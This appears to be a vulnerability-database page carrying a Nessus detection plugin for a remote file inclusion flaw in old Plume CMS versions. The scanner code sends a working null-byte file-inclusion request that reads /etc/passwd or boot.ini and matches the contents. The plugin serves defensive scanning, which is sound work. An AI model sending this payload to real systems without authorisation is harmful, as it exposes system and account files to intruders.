Lucene search
K
Database
Vendors
Products
Years
CVSS
Scanner
Agent Scanning
API Scanning
Manual Audit
Perimeter Scanner
Scanning
Projects
Email
Webhook
Plugins
Resources
Documents
Blog
Glossary
FAQ
Pricing
Contacts
About Us
Partners
Branding Guideline
nessusThis script is Copyright (C) 2006-2022 Ferdy RiphagenPLUMECMS_PREPEND_FILE_INCLUSION.NASL
HistoryFeb 23, 2006 - 12:00 a.m.

Plume CMS < 1.0.3 Remote File Inclusion

2006-02-2300:00:00
This script is Copyright (C) 2006-2022 Ferdy Riphagen
www.tenable.com
22
JSON

The system is running Plume CMS a simple but powerful content management system.

The version installed does not sanitize user input in the ‘_PX_config[manager_path]’ parameter in the ‘prepend.php’ file.
This allows an attacker to include arbitrary files and execute code on the system.

This flaw is exploitable if PHP’s register_globals is enabled.

#%NASL_MIN_LEVEL 70300
#
# Script Written By Ferdy Riphagen 
# <f[dot]riphagen[at]nsec[dot]nl>
#
# Script distributed under the GNU GPLv2 License.
#

# Changes by Tenable:
# - Revised plugin title (3/31/2009)

include('deprecated_nasl_level.inc');
include('compat.inc');

if (description)
{
  script_id(20972);
  script_version("1.24");
  script_set_attribute(attribute:"plugin_modification_date", value:"2022/04/11");

  script_cve_id("CVE-2006-0725");
  script_bugtraq_id(16662);

  script_name(english:"Plume CMS < 1.0.3 Remote File Inclusion");

  script_set_attribute(attribute:"synopsis", value:
"The remote host is running a PHP application that is prone
to local and remote file inclusion attacks.");
  script_set_attribute(attribute:"description", value:
"The system is running Plume CMS a simple but powerful 
content management system.

The version installed does not sanitize user input in the
'_PX_config[manager_path]' parameter in the 'prepend.php' file.
This allows an attacker to include arbitrary files and execute code
on the system.

This flaw is exploitable if PHP's register_globals is enabled.");
  # https://web.archive.org/web/20060426074003/http://www.plume-cms.net/news/77-Security-Notice-Please-Update-Your-Prependphp-File
  script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e9e65567");
  script_set_attribute(attribute:"see_also", value:"https://secuniaresearch.flexerasoftware.com/advisories/18883/");
  script_set_attribute(attribute:"solution", value:
"Either sanitize the prepend.php file as advised by the developer 
(see first URL) or upgrade to Plume CMS version 1.0.3 or later.");
  script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
  script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");

  script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
  script_set_attribute(attribute:"exploit_available", value:"false");
  script_set_attribute(attribute:"exploited_by_nessus", value:"true");

  script_set_attribute(attribute:"vuln_publication_date", value:"2006/02/15");
  script_set_attribute(attribute:"plugin_publication_date", value:"2006/02/23");

  script_set_attribute(attribute:"plugin_type", value:"remote");
  script_set_attribute(attribute:"cpe", value:"cpe:/a:plume-cms:plume_cms");
  script_set_attribute(attribute:"thorough_tests", value:"true");
  script_end_attributes();

  script_category(ACT_ATTACK);
  script_family(english:"CGI abuses");

  script_copyright(english:"This script is Copyright (C) 2006-2022 Ferdy Riphagen");

  script_dependencies("http_version.nasl");
  script_require_keys("www/PHP");
  script_exclude_keys("Settings/disable_cgi_scanning");
  script_require_ports("Services/www", 80);

  exit(0);
}

include("global_settings.inc");
include("http_func.inc");
include("http_keepalive.inc");
include("misc_func.inc");

port = get_http_port(default:80, embedded:TRUE);
if (get_kb_item("Services/www/"+port+"/embedded")) exit(0);
if (!can_host_php(port:port)) exit(0);

# Check a few directories.
if (thorough_tests) dirs = list_uniq(make_list("/plume", "/cms", "/", cgi_dirs()));
else dirs = make_list(cgi_dirs());

foreach dir (dirs) {
 res = http_get_cache_ka(item:string(dir, "/index.php"), port:port);
 if(res == NULL) exit(0);

 if('"powered by PLUME CMS' >< res && egrep(pattern:'<a href=[^>]+.*alt="powered by PLUME CMS', string:res)) {

  # Try to grab a local file.
  file[0] = "/etc/passwd";
  file[1] = "c:/boot.ini";

  for(test = 0; file[test]; test++) {
   req = http_get(item:string(dir, "/prepend.php?_PX_config[manager_path]=", file[test], "%00"), port:port); 
   #debug_print("req: ", req, "\n");

   recv = http_keepalive_send_recv(data:req, bodyonly:TRUE, port:port);
   if (!recv) exit(0);
   #debug_print("recv: ", recv, "\n");

   if (egrep(pattern:"root:.*:0:[01]:.*:", string:recv) ||
       egrep(pattern:"default=multi.*disk.*partition", string:recv) ||
       # And if magic_quotes_gpc = on, check for error messages.
       egrep(pattern:"Warning.+\([^>]+\\0/conf/config\.php.+failed to open stream", string:recv)) {
    security_hole(port);
    exit(0);
   }
   if (!thorough_tests) break;  
  }
 }
}
VendorProductVersionCPE
plume-cmsplume_cmscpe:/a:plume-cms:plume_cms

Related

checkpoint_advisories 1
openvas 2
prion 2
cve 4
checkpoint_advisories
checkpoint_advisories
Update Protection against Plume CMS manager_path Code Execution Vulnerability
2006-07-16 00:00:00
openvas
openvas
Plume CMS <= 1.0.2 Remote File Inclusion Vulnerability
2006-03-26 00:00:00
Plume CMS <= 1.0.2 Remote File Inclusion Vulnerability
2006-03-26 00:00:00
prion
prion
Remote file inclusion
2006-02-16 11:02:00
Remote file inclusion
2006-05-30 10:02:00
cve
cve
CVE-2006-0725
2006-02-16 11:02:00
CVE-2006-2645
2006-05-30 10:02:00
CVE-2006-3562
2006-07-13 01:05:00
JSON
Related for PLUMECMS_PREPEND_FILE_INCLUSION.NASL
checkpoint_advisories1openvas2prion2cve4